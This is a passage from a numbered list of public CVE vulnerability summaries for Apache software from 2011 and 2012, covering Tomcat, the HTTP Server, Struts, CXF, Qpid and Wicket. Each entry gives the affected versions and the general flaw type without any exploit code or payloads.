13345| [CVE-2012-5633] The URIMappingInterceptor in Apache CXF before 2.5.8, 2.6.x before 2.6.5, and 2.7.x before 2.7.2, when using the WSS4JInInterceptor, bypasses WS-Security processing, which allows remote attackers to obtain access to SOAP services via an HTTP GET request.
13346| [CVE-2012-5616] Apache CloudStack 4.0.0-incubating and Citrix CloudPlatform (formerly Citrix CloudStack) before 3.0.6 stores sensitive information in the log4j.conf log file, which allows local users to obtain (1) the SSH private key as recorded by the createSSHKeyPair API, (2) the password of an added host as recorded by the AddHost API, or the password of an added VM as recorded by the (3) DeployVM or (4) ResetPasswordForVM API.
13347| [CVE-2012-5568] Apache Tomcat through 7.0.x allows remote attackers to cause a denial of service (daemon outage) via partial HTTP requests, as demonstrated by Slowloris.
13348| [CVE-2012-5351] Apache Axis2 allows remote attackers to forge messages and bypass authentication via a SAML assertion that lacks a Signature element, aka a "Signature exclusion attack," a different vulnerability than CVE-2012-4418.
13349| [CVE-2012-4558] Multiple cross-site scripting (XSS) vulnerabilities in the balancer_handler function in the manager interface in mod_proxy_balancer.c in the mod_proxy_balancer module in the Apache HTTP Server 2.2.x before 2.2.24-dev and 2.4.x before 2.4.4 allow remote attackers to inject arbitrary web script or HTML via a crafted string.
13350| [CVE-2012-4557] The mod_proxy_ajp module in the Apache HTTP Server 2.2.12 through 2.2.21 places a worker node into an error state upon detection of a long request-processing time, which allows remote attackers to cause a denial of service (worker consumption) via an expensive request.
13351| [CVE-2012-4556] The token processing system (pki-tps) in Red Hat Certificate System (RHCS) before 8.1.3 allows remote attackers to cause a denial of service (Apache httpd web server child process restart) via certain unspecified empty search fields in a user certificate search query.
13352| [CVE-2012-4555] The token processing system (pki-tps) in Red Hat Certificate System (RHCS) before 8.1.3 does not properly handle interruptions of token format operations, which allows remote attackers to cause a denial of service (NULL pointer dereference and Apache httpd web server child process crash) via unspecified vectors.
13353| [CVE-2012-4534] org/apache/tomcat/util/net/NioEndpoint.java in Apache Tomcat 6.x before 6.0.36 and 7.x before 7.0.28, when the NIO connector is used in conjunction with sendfile and HTTPS, allows remote attackers to cause a denial of service (infinite loop) by terminating the connection during the reading of a response.
13354| [CVE-2012-4528] The mod_security2 module before 2.7.0 for the Apache HTTP Server allows remote attackers to bypass rules, and deliver arbitrary POST data to a PHP application, via a multipart request in which an invalid part precedes the crafted data.
13355| [CVE-2012-4501] Citrix Cloud.com CloudStack, and Apache CloudStack pre-release, allows remote attackers to make arbitrary API calls by leveraging the system user account, as demonstrated by API calls to delete VMs.
13356| [CVE-2012-4460] The serializing/deserializing functions in the qpid::framing::Buffer class in Apache Qpid 0.20 and earlier allow remote attackers to cause a denial of service (assertion failure and daemon exit) via unspecified vectors. NOTE: this issue could also trigger an out-of-bounds read, but it might not trigger a crash.
13357| [CVE-2012-4459] Integer overflow in the qpid::framing::Buffer::checkAvailable function in Apache Qpid 0.20 and earlier allows remote attackers to cause a denial of service (crash) via a crafted message, which triggers an out-of-bounds read.
13358| [CVE-2012-4458] The AMQP type decoder in Apache Qpid 0.20 and earlier allows remote attackers to cause a denial of service (memory consumption and server crash) via a large number of zero width elements in the client-properties map in a connection.start-ok message.
13359| [CVE-2012-4446] The default configuration for Apache Qpid 0.20 and earlier, when the federation_tag attribute is enabled, accepts AMQP connections without checking the source user ID, which allows remote attackers to bypass authentication and have other unspecified impact via an AMQP request.
13360| [CVE-2012-4431] org/apache/catalina/filters/CsrfPreventionFilter.java in Apache Tomcat 6.x before 6.0.36 and 7.x before 7.0.32 allows remote attackers to bypass the cross-site request forgery (CSRF) protection mechanism via a request that lacks a session identifier.
13361| [CVE-2012-4418] Apache Axis2 allows remote attackers to forge messages and bypass authentication via an "XML Signature wrapping attack."
13362| [CVE-2012-4387] Apache Struts 2.0.0 through 2.3.4 allows remote attackers to cause a denial of service (CPU consumption) via a long parameter name, which is processed as an OGNL expression.
13363| [CVE-2012-4386] The token check mechanism in Apache Struts 2.0.0 through 2.3.4 does not properly validate the token name configuration parameter, which allows remote attackers to perform cross-site request forgery (CSRF) attacks by setting the token name configuration parameter to a session attribute.
13364| [CVE-2012-4360] Cross-site scripting (XSS) vulnerability in the mod_pagespeed module 0.10.19.1 through 0.10.22.4 for the Apache HTTP Server allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
13365| [CVE-2012-4063] The Apache Santuario configuration in Eucalyptus before 3.1.1 does not properly restrict applying XML Signature transforms to documents, which allows remote attackers to cause a denial of service via unspecified vectors.
13366| [CVE-2012-4001] The mod_pagespeed module before 0.10.22.6 for the Apache HTTP Server does not properly verify its host name, which allows remote attackers to trigger HTTP requests to arbitrary hosts via unspecified vectors, as demonstrated by requests to intranet servers.
13367| [CVE-2012-3908] Multiple cross-site request forgery (CSRF) vulnerabilities in the ISE Administrator user interface (aka the Apache Tomcat interface) on Cisco Identity Services Engine (ISE) 3300 series appliances before 1.1.0.665 Cumulative Patch 1 allow remote attackers to hijack the authentication of administrators, aka Bug ID CSCty46684.
13368| [CVE-2012-3546] org/apache/catalina/realm/RealmBase.java in Apache Tomcat 6.x before 6.0.36 and 7.x before 7.0.30, when FORM authentication is used, allows remote attackers to bypass security-constraint checks by leveraging a previous setUserPrincipal call and then placing /j_security_check at the end of a URI.
13369| [CVE-2012-3544] Apache Tomcat 6.x before 6.0.37 and 7.x before 7.0.30 does not properly handle chunk extensions in chunked transfer coding, which allows remote attackers to cause a denial of service by streaming data.
13370| [CVE-2012-3526] The reverse proxy add forward module (mod_rpaf) 0.5 and 0.6 for the Apache HTTP Server allows remote attackers to cause a denial of service (server or application crash) via multiple X-Forwarded-For headers in a request.
13371| [CVE-2012-3513] munin-cgi-graph in Munin before 2.0.6, when running as a CGI module under Apache, allows remote attackers to load new configurations and create files in arbitrary directories via the logdir command.
13372| [CVE-2012-3506] Unspecified vulnerability in the Apache Open For Business Project (aka OFBiz) 10.04.x before 10.04.03 has unknown impact and attack vectors.
13373| [CVE-2012-3502] The proxy functionality in (1) mod_proxy_ajp.c in the mod_proxy_ajp module and (2) mod_proxy_http.c in the mod_proxy_http module in the Apache HTTP Server 2.4.x before 2.4.3 does not properly determine the situations that require closing a back-end connection, which allows remote attackers to obtain sensitive information in opportunistic circumstances by reading a response that was intended for a different client.
13374| [CVE-2012-3499] Multiple cross-site scripting (XSS) vulnerabilities in the Apache HTTP Server 2.2.x before 2.2.24-dev and 2.4.x before 2.4.4 allow remote attackers to inject arbitrary web script or HTML via vectors involving hostnames and URIs in the (1) mod_imagemap, (2) mod_info, (3) mod_ldap, (4) mod_proxy_ftp, and (5) mod_status modules.
13375| [CVE-2012-3467] Apache QPID 0.14, 0.16, and earlier uses a NullAuthenticator mechanism to authenticate catch-up shadow connections to AMQP brokers, which allows remote attackers to bypass authentication.
13376| [CVE-2012-3451] Apache CXF before 2.4.9, 2.5.x before 2.5.5, and 2.6.x before 2.6.2 allows remote attackers to execute unintended web-service operations by sending a header with a SOAP Action String that is inconsistent with the message body.
13377| [CVE-2012-3446] Apache Libcloud before 0.11.1 uses an incorrect regular expression during verification of whether the server hostname matches a domain name in the subject's Common Name (CN) or subjectAltName field of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via a crafted certificate.
13378| [CVE-2012-3376] DataNodes in Apache Hadoop 2.0.0 alpha does not check the BlockTokens of clients when Kerberos is enabled and the DataNode has checked out the same BlockPool twice from a NodeName, which might allow remote clients to read arbitrary blocks, write to blocks to which they only have read access, and have other unspecified impacts.
13379| [CVE-2012-3373] Cross-site scripting (XSS) vulnerability in Apache Wicket 1.4.x before 1.4.21 and 1.5.x before 1.5.8 allows remote attackers to inject arbitrary web script or HTML via vectors involving a %00 sequence in an Ajax link URL associated with a Wicket app.
13380| [CVE-2012-3126] Unspecified vulnerability in the Solaris Cluster component in Oracle Sun Products Suite 3.3 allows local users to affect confidentiality, integrity, and availability via unknown vectors related to Apache Tomcat Agent.
13381| [CVE-2012-3123] Unspecified vulnerability in Oracle Sun Solaris 10 allows remote attackers to affect confidentiality, related to Apache HTTP Server.
13382| [CVE-2012-2760] mod_auth_openid before 0.7 for Apache uses world-readable permissions for /tmp/mod_auth_openid.db, which allows local users to obtain session ids.
13383| [CVE-2012-2733] java/org/apache/coyote/http11/InternalNioInputBuffer.java in the HTTP NIO connector in Apache Tomcat 6.x before 6.0.36 and 7.x before 7.0.28 does not properly restrict the request-header size, which allows remote attackers to cause a denial of service (memory consumption) via a large amount of header data.
13384| [CVE-2012-2687] Multiple cross-site scripting (XSS) vulnerabilities in the make_variant_list function in mod_negotiation.c in the mod_negotiation module in the Apache HTTP Server 2.4.x before 2.4.3, when the MultiViews option is enabled, allow remote attackers to inject arbitrary web script or HTML via a crafted filename that is not properly handled during construction of a variant list.
13385| [CVE-2012-2381] Multiple cross-site scripting (XSS) vulnerabilities in Apache Roller before 5.0.1 allow remote authenticated users to inject arbitrary web script or HTML by leveraging the blogger role.
13386| [CVE-2012-2380] Multiple cross-site request forgery (CSRF) vulnerabilities in the admin/editor console in Apache Roller before 5.0.1 allow remote attackers to hijack the authentication of admins or editors by leveraging the HTTP POST functionality.
13387| [CVE-2012-2379] Apache CXF 2.4.x before 2.4.8, 2.5.x before 2.5.4, and 2.6.x before 2.6.1, when a Supporting Token specifies a child WS-SecurityPolicy 1.1 or 1.2 policy, does not properly ensure that an XML element is signed or encrypted, which has unspecified impact and attack vectors.
13388| [CVE-2012-2378] Apache CXF 2.4.5 through 2.4.7, 2.5.1 through 2.5.3, and 2.6.x before 2.6.1, does not properly enforce child policies of a WS-SecurityPolicy 1.1 SupportingToken policy on the client side, which allows remote attackers to bypass the (1) AlgorithmSuite, (2) SignedParts, (3) SignedElements, (4) EncryptedParts, and (5) EncryptedElements policies.
13389| [CVE-2012-2329] Buffer overflow in the apache_request_headers function in sapi/cgi/cgi_main.c in PHP 5.4.x before 5.4.3 allows remote attackers to cause a denial of service (application crash) via a long string in the header of an HTTP request.
13390| [CVE-2012-2145] Apache Qpid 0.17 and earlier does not properly restrict incoming client connections, which allows remote attackers to cause a denial of service (file descriptor consumption) via a large number of incomplete connections.
13391| [CVE-2012-2138] The @CopyFrom operation in the POST servlet in the org.apache.sling.servlets.post bundle before 2.1.2 in Apache Sling does not prevent attempts to copy an ancestor node to a descendant node, which allows remote attackers to cause a denial of service (infinite loop) via a crafted HTTP request.
13392| [CVE-2012-2098] Algorithmic complexity vulnerability in the sorting algorithms in bzip2 compressing stream (BZip2CompressorOutputStream) in Apache Commons Compress before 1.4.1 allows remote attackers to cause a denial of service (CPU consumption) via a file with many repeating inputs.
13393| [CVE-2012-1574] The Kerberos/MapReduce security functionality in Apache Hadoop 0.20.203.0 through 0.20.205.0, 0.23.x before 0.23.2, and 1.0.x before 1.0.2, as used in Cloudera CDH CDH3u0 through CDH3u2, Cloudera hadoop-0.20-sbin before 0.20.2+923.197, and other products, allows remote authenticated users to impersonate arbitrary cluster user accounts via unspecified vectors.
13394| [CVE-2012-1181] fcgid_spawn_ctl.c in the mod_fcgid module 2.3.6 for the Apache HTTP Server does not recognize the FcgidMaxProcessesPerClass directive for a virtual host, which makes it easier for remote attackers to cause a denial of service (memory consumption) via a series of HTTP requests that triggers a process count higher than the intended limit.
13395| [CVE-2012-1089] Directory traversal vulnerability in Apache Wicket 1.4.x before 1.4.20 and 1.5.x before 1.5.5 allows remote attackers to read arbitrary web-application files via a relative pathname in a URL for a Wicket resource that corresponds to a null package.
13396| [CVE-2012-1007] Multiple cross-site scripting (XSS) vulnerabilities in Apache Struts 1.3.10 allow remote attackers to inject arbitrary web script or HTML via (1) the name parameter to struts-examples/upload/upload-submit.do, or the message parameter to (2) struts-cookbook/processSimple.do or (3) struts-cookbook/processDyna.do.
13397| [CVE-2012-1006] Multiple cross-site scripting (XSS) vulnerabilities in Apache Struts 2.0.14 and 2.2.3 allow remote attackers to inject arbitrary web script or HTML via the (1) name or (2) lastName parameter to struts2-showcase/person/editPerson.action, or the (3) clientName parameter to struts2-rest-showcase/orders.
13398| [CVE-2012-0883] envvars (aka envvars-std) in the Apache HTTP Server before 2.4.2 places a zero-length directory name in the LD_LIBRARY_PATH, which allows local users to gain privileges via a Trojan horse DSO in the current working directory during execution of apachectl.
13399| [CVE-2012-0840] tables/apr_hash.c in the Apache Portable Runtime (APR) library through 1.4.5 computes hash values without restricting the ability to trigger hash collisions predictably, which allows context-dependent attackers to cause a denial of service (CPU consumption) via crafted input to an application that maintains a hash table.
13400| [CVE-2012-0838] Apache Struts 2 before 2.2.3.1 evaluates a string as an OGNL expression during the handling of a conversion error, which allows remote attackers to modify run-time data values, and consequently execute arbitrary code, via invalid input to a field.
13401| [CVE-2012-0788] The PDORow implementation in PHP before 5.3.9 does not properly interact with the session feature, which allows remote attackers to cause a denial of service (application crash) via a crafted application that uses a PDO driver for a fetch and then calls the session_start function, as demonstrated by a crash of the Apache HTTP Server.
13402| [CVE-2012-0394] ** DISPUTED ** The DebuggingInterceptor component in Apache Struts before 2.3.1.1, when developer mode is used, allows remote attackers to execute arbitrary commands via unspecified vectors. NOTE: the vendor characterizes this behavior as not "a security vulnerability itself."
13403| [CVE-2012-0393] The ParameterInterceptor component in Apache Struts before 2.3.1.1 does not prevent access to public constructors, which allows remote attackers to create or overwrite arbitrary files via a crafted parameter that triggers the creation of a Java object.
13404| [CVE-2012-0392] The CookieInterceptor component in Apache Struts before 2.3.1.1 does not use the parameter-name whitelist, which allows remote attackers to execute arbitrary commands via a crafted HTTP Cookie header that triggers Java code execution through a static method.
13405| [CVE-2012-0391] The ExceptionDelegator component in Apache Struts before 2.2.3.1 interprets parameter values as OGNL expressions during certain exception handling for mismatched data types of properties, which allows remote attackers to execute arbitrary Java code via a crafted parameter.
13406| [CVE-2012-0256] Apache Traffic Server 2.0.x and 3.0.x before 3.0.4 and 3.1.x before 3.1.3 does not properly allocate heap memory, which allows remote attackers to cause a denial of service (daemon crash) via a long HTTP Host header.
13407| [CVE-2012-0216] The default configuration of the apache2 package in Debian GNU/Linux squeeze before 2.2.16-6+squeeze7, wheezy before 2.2.22-4, and sid before 2.2.22-4, when mod_php or mod_rivet is used, provides example scripts under the doc/ URI, which might allow local users to conduct cross-site scripting (XSS) attacks, gain privileges, or obtain sensitive information via vectors involving localhost HTTP requests to the Apache HTTP Server.
13408| [CVE-2012-0213] The UnhandledDataStructure function in hwpf/model/UnhandledDataStructure.java in Apache POI 3.8 and earlier allows remote attackers to cause a denial of service (OutOfMemoryError exception and possibly JVM destabilization) via a crafted length value in a Channel Definition Format (CDF) or Compound File Binary Format (CFBF) document.
13409| [CVE-2012-0053] protocol.c in the Apache HTTP Server 2.2.x through 2.2.21 does not properly restrict header information during construction of Bad Request (aka 400) error documents, which allows remote attackers to obtain the values of HTTPOnly cookies via vectors involving a (1) long or (2) malformed header in conjunction with crafted web script.
13410| [CVE-2012-0047] Cross-site scripting (XSS) vulnerability in Apache Wicket 1.4.x before 1.4.20 allows remote attackers to inject arbitrary web script or HTML via the wicket:pageMapName parameter.
13411| [CVE-2012-0031] scoreboard.c in the Apache HTTP Server 2.2.21 and earlier might allow local users to cause a denial of service (daemon crash during shutdown) or possibly have unspecified other impact by modifying a certain type field within a scoreboard shared memory segment, leading to an invalid call to the free function.
13412| [CVE-2012-0022] Apache Tomcat 5.5.x before 5.5.35, 6.x before 6.0.34, and 7.x before 7.0.23 uses an inefficient approach for handling parameters, which allows remote attackers to cause a denial of service (CPU consumption) via a request that contains many parameters and parameter values, a different vulnerability than CVE-2011-4858.
13413| [CVE-2012-0021] The log_cookie function in mod_log_config.c in the mod_log_config module in the Apache HTTP Server 2.2.17 through 2.2.21, when a threaded MPM is used, does not properly handle a %{}C format string, which allows remote attackers to cause a denial of service (daemon crash) via a cookie that lacks both a name and a value.
13414| [CVE-2011-5064] DigestAuthenticator.java in the HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.34, 6.x before 6.0.33, and 7.x before 7.0.12 uses Catalina as the hard-coded server secret (aka private key), which makes it easier for remote attackers to bypass cryptographic protection mechanisms by leveraging knowledge of this string, a different vulnerability than CVE-2011-1184.
13415| [CVE-2011-5063] The HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.34, 6.x before 6.0.33, and 7.x before 7.0.12 does not check realm values, which might allow remote attackers to bypass intended access restrictions by leveraging the availability of a protection space with weaker authentication or authorization requirements, a different vulnerability than CVE-2011-1184.
13416| [CVE-2011-5062] The HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.34, 6.x before 6.0.33, and 7.x before 7.0.12 does not check qop values, which might allow remote attackers to bypass intended integrity-protection requirements via a qop=auth value, a different vulnerability than CVE-2011-1184.
13417| [CVE-2011-5057] Apache Struts 2.3.1.1 and earlier provides interfaces that do not properly restrict access to collections such as the session and request collections, which might allow remote attackers to modify run-time data values via a crafted parameter to an application that implements an affected interface, as demonstrated by the SessionAware, RequestAware, ApplicationAware, ServletRequestAware, ServletResponseAware, and ParameterAware interfaces. NOTE: the vendor disputes the significance of this report because of an "easy work-around in existing apps by configuring the interceptor."
13418| [CVE-2011-5034] Apache Geronimo 2.2.1 and earlier computes hash values for form parameters without restricting the ability to trigger hash collisions predictably, which allows remote attackers to cause a denial of service (CPU consumption) by sending many crafted parameters. NOTE: this might overlap CVE-2011-4461.
13419| [CVE-2011-4905] Apache ActiveMQ before 5.6.0 allows remote attackers to cause a denial of service (file-descriptor exhaustion and broker crash or hang) by sending many openwire failover:tcp:// connection requests.
13420| [CVE-2011-4858] Apache Tomcat before 5.5.35, 6.x before 6.0.35, and 7.x before 7.0.23 computes hash values for form parameters without restricting the ability to trigger hash collisions predictably, which allows remote attackers to cause a denial of service (CPU consumption) by sending many crafted parameters.
13421| [CVE-2011-4668] IBM Tivoli Netcool/Reporter 2.2 before 2.2.0.8 allows remote attackers to execute arbitrary code via vectors related to an unspecified CGI program used with the Apache HTTP Server.
13422| [CVE-2011-4449] actions/files/files.php in WikkaWiki 1.3.1 and 1.3.2, when INTRANET_MODE is enabled, supports file uploads for file extensions that are typically absent from an Apache HTTP Server TypesConfig file, which makes it easier for remote attackers to execute arbitrary PHP code by placing this code in a file whose name has multiple extensions, as demonstrated by a (1) .mm or (2) .vpp file.
13423| [CVE-2011-4415] The ap_pregsub function in server/util.c in the Apache HTTP Server 2.0.x through 2.0.64 and 2.2.x through 2.2.21, when the mod_setenvif module is enabled, does not restrict the size of values of environment variables, which allows local users to cause a denial of service (memory consumption or NULL pointer dereference) via a .htaccess file with a crafted SetEnvIf directive, in conjunction with a crafted HTTP request header, related to (1) the "len +=" statement and (2) the apr_pcalloc function call, a different vulnerability than CVE-2011-3607.
13424| [CVE-2011-4317] The mod_proxy module in the Apache HTTP Server 1.3.x through 1.3.42, 2.0.x through 2.0.64, and 2.2.x through 2.2.21, when the Revision 1179239 patch is in place, does not properly interact with use of (1) RewriteRule and (2) ProxyPassMatch pattern matches for configuration of a reverse proxy, which allows remote attackers to send requests to intranet servers via a malformed URI containing an @ (at sign) character and a : (colon) character in invalid positions. NOTE: this vulnerability exists because of an incomplete fix for CVE-2011-3368.
13425| [CVE-2011-3639] The mod_proxy module in the Apache HTTP Server 2.0.x through 2.0.64 and 2.2.x before 2.2.18, when the Revision 1179239 patch is in place, does not properly interact with use of (1) RewriteRule and (2) ProxyPassMatch pattern matches for configuration of a reverse proxy, which allows remote attackers to send requests to intranet servers by using the HTTP/0.9 protocol with a malformed URI containing an initial @ (at sign) character. NOTE: this vulnerability exists because of an incomplete fix for CVE-2011-3368.
13426| [CVE-2011-3620] Apache Qpid 0.12 does not properly verify credentials during the joining of a cluster, which allows remote attackers to obtain access to the messaging functionality and job functionality of a cluster by leveraging knowledge of a cluster-username.
13427| [CVE-2011-3607] Integer overflow in the ap_pregsub function in server/util.c in the Apache HTTP Server 2.0.x through 2.0.64 and 2.2.x through 2.2.21, when the mod_setenvif module is enabled, allows local users to gain privileges via a .htaccess file with a crafted SetEnvIf directive, in conjunction with a crafted HTTP request header, leading to a heap-based buffer overflow.
13428| [CVE-2011-3376] org/apache/catalina/core/DefaultInstanceManager.java in Apache Tomcat 7.x before 7.0.22 does not properly restrict ContainerServlets in the Manager application, which allows local users to gain privileges by using an untrusted web application to access the Manager application's functionality.
13429| [CVE-2011-3375] Apache Tomcat 6.0.30 through 6.0.33 and 7.x before 7.0.22 does not properly perform certain caching and recycling operations involving request objects, which allows remote attackers to obtain unintended read access to IP address and HTTP header information in opportunistic circumstances by reading TCP data.
13430| [CVE-2011-3368] The mod_proxy module in the Apache HTTP Server 1.3.x through 1.3.42, 2.0.x through 2.0.64, and 2.2.x through 2.2.21 does not properly interact with use of (1) RewriteRule and (2) ProxyPassMatch pattern matches for configuration of a reverse proxy, which allows remote attackers to send requests to intranet servers via a malformed URI containing an initial @ (at sign) character.
13431| [CVE-2011-3348] The mod_proxy_ajp module in the Apache HTTP Server before 2.2.21, when used with mod_proxy_balancer in certain configurations, allows remote attackers to cause a denial of service (temporary "error state" in the backend server) via a malformed HTTP request.
13432| [CVE-2011-3192] The byterange filter in the Apache HTTP Server 1.3.x, 2.0.x through 2.0.64, and 2.2.x through 2.2.19 allows remote attackers to cause a denial of service (memory and CPU consumption) via a Range header that expresses multiple overlapping ranges, as exploited in the wild in August 2011, a different vulnerability than CVE-2007-0086.
13433| [CVE-2011-3190] Certain AJP protocol connector implementations in Apache Tomcat 7.0.0 through 7.0.20, 6.0.0 through 6.0.33, 5.5.0 through 5.5.33, and possibly other versions allow remote attackers to spoof AJP requests, bypass authentication, and obtain sensitive information by causing the connector to interpret a request body as a new request.
13434| [CVE-2011-2729] native/unix/native/jsvc-unix.c in jsvc in the Daemon component 1.0.3 through 1.0.6 in Apache Commons, as used in Apache Tomcat 5.5.32 through 5.5.33, 6.0.30 through 6.0.32, and 7.0.x before 7.0.20 on Linux, does not drop capabilities, which allows remote attackers to bypass read permissions for files via a request to an application.
13435| [CVE-2011-2712] Cross-site scripting (XSS) vulnerability in Apache Wicket 1.4.x before 1.4.18, when setAutomaticMultiWindowSupport is enabled, allows remote attackers to inject arbitrary web script or HTML via unspecified parameters.
13436| [CVE-2011-2688] SQL injection vulnerability in mysql/mysql-auth.pl in the mod_authnz_external module 3.2.5 and earlier for the Apache HTTP Server allows remote attackers to execute arbitrary SQL commands via the user field.
13437| [CVE-2011-2526] Apache Tomcat 5.5.x before 5.5.34, 6.x before 6.0.33, and 7.x before 7.0.19, when sendfile is enabled for the HTTP APR or HTTP NIO connector, does not validate certain request attributes, which allows local users to bypass intended file access restrictions or cause a denial of service (infinite loop or JVM crash) by leveraging an untrusted web application.
13438| [CVE-2011-2516] Off-by-one error in the XML signature feature in Apache XML Security for C++ 1.6.0, as used in Shibboleth before 2.4.3 and possibly other products, allows remote attackers to cause a denial of service (crash) via a signature using a large RSA key, which triggers a buffer overflow.
13439| [CVE-2011-2481] Apache Tomcat 7.0.x before 7.0.17 permits web applications to replace an XML parser used for other web applications, which allows local users to read or modify the (1) web.xml, (2) context.xml, or (3) tld files of arbitrary web applications via a crafted application that is loaded earlier than the target application. NOTE: this vulnerability exists because of a CVE-2009-0783 regression.
13440| [CVE-2011-2329] The rampart_timestamp_token_validate function in util/rampart_timestamp_token.c in Apache Rampart/C 1.3.0 does not properly calculate the expiration of timestamp tokens, which allows remote attackers to bypass intended access restrictions by leveraging an expired token, a different vulnerability than CVE-2011-0730.
13441| [CVE-2011-2204] Apache Tomcat 5.5.x before 5.5.34, 6.x before 6.0.33, and 7.x before 7.0.17, when the MemoryUserDatabase is used, creates log entries containing passwords upon encountering errors in JMX user creation, which allows local users to obtain sensitive information by reading a log file.
13442| [CVE-2011-2088] XWork 2.2.1 in Apache Struts 2.2.1, and OpenSymphony XWork in OpenSymphony WebWork, allows remote attackers to obtain potentially sensitive information about internal Java class paths via vectors involving an s:submit element and a nonexistent method, a different vulnerability than CVE-2011-1772.3.
13443| [CVE-2011-2087] Multiple cross-site scripting (XSS) vulnerabilities in component handlers in the javatemplates (aka Java Templates) plugin in Apache Struts 2.x before 2.2.3 allow remote attackers to inject arbitrary web script or HTML via an arbitrary parameter value to a .action URI, related to improper handling of value attributes in (1) FileHandler.java, (2) HiddenHandler.java, (3) PasswordHandler.java, (4) RadioHandler.java, (5) ResetHandler.java, (6) SelectHandler.java, (7) SubmitHandler.java, and (8) TextFieldHandler.java.
13444| [CVE-2011-1928] The fnmatch implementation in apr_fnmatch.c in the Apache Portable Runtime (APR) library 1.4.3 and 1.4.4, and the Apache HTTP Server 2.2.18, allows remote attackers to cause a denial of service (infinite loop) via a URI that does not match unspecified types of wildcard patterns, as demonstrated by attacks against mod_autoindex in httpd when a /*/WEB-INF/ configuration pattern is used. NOTE: this issue exists because of an incorrect fix for CVE-2011-0419.
13445| [CVE-2011-1921] The mod_dav_svn module for the Apache HTTP Server, as distributed in Apache Subversion 1.5.x and 1.6.x before 1.6.17, when the SVNPathAuthz short_circuit option is disabled, does not properly enforce permissions for files that had been publicly readable in the past, which allows remote attackers to obtain sensitive information via a replay REPORT operation.
13446| [CVE-2011-1783] The mod_dav_svn module for the Apache HTTP Server, as distributed in Apache Subversion 1.5.x and 1.6.x before 1.6.17, when the SVNPathAuthz short_circuit option is enabled, allows remote attackers to cause a denial of service (infinite loop and memory consumption) in opportunistic circumstances by requesting data.
13447| [CVE-2011-1772] Multiple cross-site scripting (XSS) vulnerabilities in XWork in Apache Struts 2.x before 2.2.3, and OpenSymphony XWork in OpenSymphony WebWork, allow remote attackers to inject arbitrary web script or HTML via vectors involving (1) an action name, (2) the action attribute of an s:submit element, or (3) the method attribute of an s:submit element.
13448| [CVE-2011-1752] The mod_dav_svn module for the Apache HTTP Server, as distributed in Apache Subversion before 1.6.17, allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) via a request for a baselined WebDAV resource, as exploited in the wild in May 2011.
13449| [CVE-2011-1610] Multiple SQL injection vulnerabilities in xmldirectorylist.jsp in the embedded Apache HTTP Server component in Cisco Unified Communications Manager (aka CUCM, formerly CallManager) 6.x before 6.1(5)su3, 7.x before 7.1(5)su4, 8.0 before 8.0(3a)su2, and 8.5 before 8.5(1)su1 allow remote attackers to execute arbitrary SQL commands via the (1) f, (2) l, or (3) n parameter, aka Bug ID CSCtj42064.
13450| [CVE-2011-1582] Apache Tomcat 7.0.12 and 7.0.13 processes the first request to a servlet without following security constraints that have been configured through annotations, which allows remote attackers to bypass intended access restrictions via HTTP requests. NOTE: this vulnerability exists because of an incomplete fix for CVE-2011-1088, CVE-2011-1183, and CVE-2011-1419.
13451| [CVE-2011-1571] Unspecified vulnerability in the XSL Content portlet in Liferay Portal Community Edition (CE) 5.x and 6.x before 6.0.6 GA, when Apache Tomcat is used, allows remote attackers to execute arbitrary commands via unknown vectors.
13452| [CVE-2011-1570] Cross-site scripting (XSS) vulnerability in Liferay Portal Community Edition (CE) 6.x before 6.0.6 GA, when Apache Tomcat is used, allows remote authenticated users to inject arbitrary web script or HTML via a message title, a different vulnerability than CVE-2004-2030.
13453| [CVE-2011-1503] The XSL Content portlet in Liferay Portal Community Edition (CE) 5.x and 6.x before 6.0.6 GA, when Apache Tomcat or Oracle GlassFish is used, allows remote authenticated users to read arbitrary (1) XSL and (2) XML files via a file:/// URL.
13454| [CVE-2011-1502] Liferay Portal Community Edition (CE) 6.x before 6.0.6 GA, when Apache Tomcat is used, allows remote authenticated users to read arbitrary files via an entity declaration in conjunction with an entity reference, related to an XML External Entity (aka XXE) issue.
13455| [CVE-2011-1498] Apache HttpClient 4.x before 4.1.1 in Apache HttpComponents, when used with an authenticating proxy server, sends the Proxy-Authorization header to the origin server, which allows remote web servers to obtain sensitive information by logging this header.
13456| [CVE-2011-1475] The HTTP BIO connector in Apache Tomcat 7.0.x before 7.0.12 does not properly handle HTTP pipelining, which allows remote attackers to read responses intended for other clients in opportunistic circumstances by examining the application data in HTTP packets, related to "a mix-up of responses for requests from different users."
13457| [CVE-2011-1419] Apache Tomcat 7.x before 7.0.11, when web.xml has no security constraints, does not follow ServletSecurity annotations, which allows remote attackers to bypass intended access restrictions via HTTP requests to a web application. NOTE: this vulnerability exists because of an incomplete fix for CVE-2011-1088.
13458| [CVE-2011-1318] Memory leak in org.apache.jasper.runtime.JspWriterImpl.response in the JavaServer Pages (JSP) component in IBM WebSphere Application Server (WAS) before 7.0.0.15 allows remote attackers to cause a denial of service (memory consumption) by accessing a JSP page of an application that is repeatedly stopped and restarted.
13459| [CVE-2011-1184] The HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.34, 6.x before 6.0.33, and 7.x before 7.0.12 does not have the expected countermeasures against replay attacks, which makes it easier for remote attackers to bypass intended access restrictions by sniffing the network for valid requests, related to lack of checking of nonce (aka server nonce) and nc (aka nonce-count or client nonce count) values.
13460| [CVE-2011-1183] Apache Tomcat 7.0.11, when web.xml has no login configuration, does not follow security constraints, which allows remote attackers to bypass intended access restrictions via HTTP requests to a meta-data complete web application. NOTE: this vulnerability exists because of an incorrect fix for CVE-2011-1088 and CVE-2011-1419.
13461| [CVE-2011-1176] The configuration merger in itk.c in the Steinar H. Gunderson mpm-itk Multi-Processing Module 2.2.11-01 and 2.2.11-02 for the Apache HTTP Server does not properly handle certain configuration sections that specify NiceValue but not AssignUserID, which might allow remote attackers to gain privileges by leveraging the root uid and root gid of an mpm-itk process.
13462| [CVE-2011-1088] Apache Tomcat 7.x before 7.0.10 does not follow ServletSecurity annotations, which allows remote attackers to bypass intended access restrictions via HTTP requests to a web application.
13463| [CVE-2011-1077] Multiple cross-site scripting (XSS) vulnerabilities in Apache Archiva 1.0 through 1.2.2, and 1.3.x before 1.3.5, allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.
